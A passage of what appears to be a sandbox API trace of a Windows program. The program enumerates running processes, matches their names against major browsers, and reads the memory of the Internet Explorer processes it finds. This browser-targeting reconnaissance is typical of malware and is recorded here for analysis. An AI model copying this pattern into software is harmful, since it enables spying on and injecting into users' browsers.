	[0251.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.155] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0251.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.155] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.156] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0251.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.156] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.157] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0251.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa1b8
	[0251.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.158] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0251.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.158] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.158] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0251.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.158] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.159] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0251.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa1bc
	[0251.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.160] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0251.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.160] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.160] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0251.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.161] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.161] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0251.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa1c0
	[0251.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.162] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0251.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.162] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.163] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0251.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.163] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.164] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0251.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa1c4
	[0251.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.165] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0251.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.165] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.166] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0251.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.167] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0251.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa1c8
	[0251.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.168] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0251.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.169] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.169] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0251.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.170] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0251.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa1cc
	[0251.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.171] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0251.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.172] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.172] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0251.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.173] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.174] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0251.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa1d0
	[0251.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.175] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0251.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.175] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.176] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0251.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.176] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.176] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.177] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa1d4
	[0251.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.177] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0251.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.178] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0251.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.178] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0251.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.178] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.179] NtQueryInformationProcess (in: ProcessHandle=0xa1d4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0251.179] ReadProcessMemory (in: hProcess=0xa1d4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0251.179] ReadProcessMemory (in: hProcess=0xa1d4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0251.179] ReadProcessMemory (in: hProcess=0xa1d4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0251.179] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0251.179] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa1d8
	[0251.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.180] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0251.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.181] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0251.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.181] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0251.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.181] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.181] NtQueryInformationProcess (in: ProcessHandle=0xa1d8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0251.181] ReadProcessMemory (in: hProcess=0xa1d8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0251.182] ReadProcessMemory (in: hProcess=0xa1d8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0251.182] ReadProcessMemory (in: hProcess=0xa1d8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0251.182] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0251.182] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa1dc
	[0251.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.183] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0251.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.183] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.184] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0251.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.184] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.184] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0251.185] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa1e0
	[0251.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.185] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0251.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.186] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.186] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0251.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.186] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.187] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa1e4
	[0251.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.187] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.188] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.188] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.189] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa1e8
	[0251.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.190] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.191] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.191] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.191] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.192] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa1ec
	[0251.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.193] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.193] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.194] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.194] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa1f0
	[0251.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.195] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0251.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.196] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.196] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0251.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.197] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa1f4
	[0251.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.198] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.199] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.199] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.199] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.200] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa1f8
	[0251.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.201] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.201] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.201] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.202] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa1fc
	[0251.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.203] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0251.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.203] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.203] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0251.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.204] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.210] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa200
	[0251.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.210] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.210] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.211] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.211] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa204
	[0251.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.212] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0251.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.213] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.213] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0251.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.213] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.213] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa208
	[0251.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.214] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.215] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.215] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.215] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa20c
	[0251.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.216] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0251.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.217] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.217] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
